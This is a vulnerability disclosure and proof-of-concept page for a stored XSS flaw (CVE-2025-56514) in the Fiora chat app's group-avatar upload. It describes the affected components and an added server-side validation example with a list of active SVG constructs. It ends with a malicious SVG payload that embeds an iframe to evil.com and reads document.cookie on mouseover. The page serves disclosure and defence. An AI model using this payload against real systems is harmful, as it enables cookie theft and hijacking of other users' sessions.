CVE-2025-56514 PoC — Fiora Cross-Site Scripting Vulnerability

Source
Associated Vulnerability
Title: Fiora Cross-Site Scripting Vulnerability (CVE-2025-56514)
Description: Cross Site Scripting (XSS) vulnerability in Fiora chat application 1.0.0 allows execution of arbitrary JavaScript when malicious SVG files are rendered by other users.
Description
Cross Site Scripting (XSS) Vulnerability in Fiora Chat Application
Readme
# CVE-2025-56514: Cross Site Scripting (XSS) Vulnerability in Fiora Chat Application

## Overview
A Cross Site Scripting (XSS) vulnerability, identified as **CVE-2025-56514**, affects the Fiora chat application version 1.0.0. This vulnerability allows an authenticated user to execute arbitrary JavaScript in the context of another user's browser by uploading a malicious SVG file through the group avatar change functionality.

## Vulnerability Details
- **Vulnerability Type**: Cross Site Scripting (XSS)
- **Attack Type**: Remote
- **Impact**: Code Execution
- **Affected Product Code Base**: Fiora 1.0.0
- **Vendor**: suisuijiang
- **Discoverer**: Kaio Mendonca Pereira

## Affected Components
The following components in the Fiora chat application are impacted:
- **Backend**: `packages/server/src/routes/group.ts` (group management routes)
- **Frontend**:
  - `packages/web/src/modules/Chat/GroupManagePanel.tsx` (group avatar upload interface)
  - `packages/web/src/service.ts` (API service layer)
  - `packages/web/src/components/Avatar.ts` (avatar rendering component)

## Attack Vectors
An authenticated user with creator privileges in a group can exploit this vulnerability as follows:
1. The user uploads a malicious SVG file containing embedded JavaScript via the "Change Group Avatar" functionality.
2. The malicious SVG is stored in the `/GroupAvatar/` directory.
3. When the SVG avatar is rendered by the `Avatar.tsx` component in another user's browser, the embedded JavaScript executes, enabling XSS exploitation.
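
One way to close the upload path described above, as an added example that is not Fiora's code or part of the original README: the server accepts only raster images identified by magic bytes and rejects SVG, naming any active constructs it finds for the audit log. The function names, the `Verdict` type and the sample inputs are assumptions constructed for illustration.

```typescript
// Added example: hypothetical server-side avatar check, not Fiora's code.
type Verdict = { allowed: boolean; kind: string; reasons: string[] };

// Accepted raster formats, identified by magic bytes (filename and client MIME type are ignored).
const RASTER_MAGIC: Array<[string, number[]]> = [
  ["png", [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]],
  ["jpeg", [0xff, 0xd8, 0xff]],
  ["gif", [0x47, 0x49, 0x46, 0x38]],
];

// Constructs that let an SVG carry script or embedded HTML; reported for logging only.
const ACTIVE_SVG: Array<[string, RegExp]> = [
  ["script element", /<\s*script\b/i],
  ["foreignObject", /<\s*foreignObject\b/i],
  ["embedded frame/object", /<\s*(iframe|embed|object)\b/i],
  ["event handler attribute", /\son[a-z]+\s*=/i],
  ["javascript: URL", /javascript\s*:/i],
];

function toBytes(s: string): Uint8Array {
  const out = new Uint8Array(s.length);
  for (let i = 0; i < s.length; i++) out[i] = s.charCodeAt(i) & 0xff;
  return out;
}

function checkAvatarUpload(data: Uint8Array): Verdict {
  for (const [kind, magic] of RASTER_MAGIC) {
    if (magic.every((b, i) => data[i] === b)) return { allowed: true, kind, reasons: [] };
  }
  // Default deny: anything that is not a known raster image is rejected, SVG included.
  let head = "";
  data.subarray(0, 8192).forEach((b) => { head += String.fromCharCode(b); });
  if (/<\s*svg\b/i.test(head)) {
    const found = ACTIVE_SVG.filter(([, re]) => re.test(head)).map(([name]) => name);
    return { allowed: false, kind: "svg", reasons: ["SVG is not an accepted avatar format", ...found] };
  }
  return { allowed: false, kind: "unknown", reasons: ["unrecognized file signature"] };
}

// Constructed samples: an SVG shaped like the one on this page (handler body made inert) and a PNG header.
const SAMPLE_SVG = toBytes(
  '<svg xmlns="http://www.w3.org/2000/svg"><foreignObject><iframe xmlns="http://www.w3.org/1999/xhtml" onmouseover="void 0"></iframe></foreignObject></svg>'
);
const SAMPLE_PNG = new Uint8Array([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0, 0, 0, 13]);
```

When storing an accepted file, derive the extension and the served `Content-Type` from the detected `kind` rather than from the upload, so a file that passes the signature check is never served as `image/svg+xml`.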

## Steps to Reproduce
1. **Authentication**: Log in to the Fiora chat application with valid credentials.
2. **Access Target Group**: Navigate to group management and select a group where you have creator privileges.
3. **Upload Malicious SVG**: Use the "Change Group Avatar" feature to upload a malicious SVG file with embedded JavaScript, such as:
   ```xml
   <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 100 100">
       <foreignObject x="0" y="0" width="100" height="100">
           <iframe xmlns="http://www.w3.org/1999/xhtml" src="https://evil.com" onmouseover="alert(document.cookie)" width="100" height="100"></iframe>
       </foreignObject>
       <text x="0" y="15"></text>
   </svg>
   ```